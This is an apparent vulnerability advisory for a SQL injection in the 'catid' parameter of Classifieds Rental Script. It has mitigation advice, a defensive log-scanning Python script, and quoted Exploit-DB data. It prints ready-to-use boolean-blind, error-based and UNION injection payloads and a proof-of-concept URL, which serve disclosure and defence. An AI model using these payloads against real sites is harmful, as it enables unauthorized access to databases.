Vendor: Classifieds Rental Script
By: Arbin Godar
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: Classifieds Rental Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2016

SQL Injection in Classifieds Rental Script

The 'catid' parameter of the 'viewproducts.php' script in Classifieds Rental Script is vulnerable to SQL injection. An attacker can exploit it by sending malicious payloads in that parameter, for example with a tool such as Sqlmap. The payloads can be of type boolean-based blind, error-based, or UNION query. Example payloads:

Boolean-based blind: catid=-1285' OR 8060=8060#
Error-based: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
UNION query: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#

Mitigation:

Validate and filter all user-supplied input before it is used in SQL queries. In addition, use parameterized queries so that input is bound as data and never interpreted as SQL.
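
One way a defender could apply the validation rule to web-server logs for this issue (an added example, not part of the original advisory or the vendor's code). It assumes combined-format access logs, a hypothetical /shop/ install path, and that legitimate catid values are positive integers; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the original page). The request paths
# reuse the script, parameter and two payload shapes quoted in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Oct/2016:10:01:02 +0000] "GET /shop/viewproducts.php?catid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Oct/2016:10:01:07 +0000] "GET /shop/viewproducts.php?catid=PoC%27 HTTP/1.1" 200 310
203.0.113.9 - - [19/Oct/2016:10:01:09 +0000] "GET /shop/viewproducts.php?catid=-1285%27%20OR%208060%3D8060%23 HTTP/1.1" 200 5120
203.0.113.7 - - [19/Oct/2016:10:02:00 +0000] "GET /shop/index.php?catid=abc HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed rule: a category id is 1 to 10 ASCII digits and nothing else.
CATID_OK = re.compile(r"[0-9]{1,10}")


def is_valid_catid(value):
    """Allow-list check; fullmatch rejects trailing newlines and extra text."""
    return CATID_OK.fullmatch(value) is not None


def suspicious_requests(log_text, script="viewproducts.php", param="catid"):
    """Return (client_ip, decoded_value) for requests whose param fails validation."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values; keep blanks so "catid=" is checked too.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not is_valid_catid(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{value!r}")
```

The same allow-list check belongs in the application before the value reaches a parameterized query; the log pass only shows which clients have already been sending values that fail it.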

Exploit-DB raw data:

# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com

*----------------------------------------------------------------------------------------------------------------------*

# Proof of Concept SQL Injection/Exploit : 
http://localhost/[PATH]/viewproducts.php?catid=PoC%27

# Exploit (using Sqlmap)
---
Parameter: catid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: catid=-1285' OR 8060=8060#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---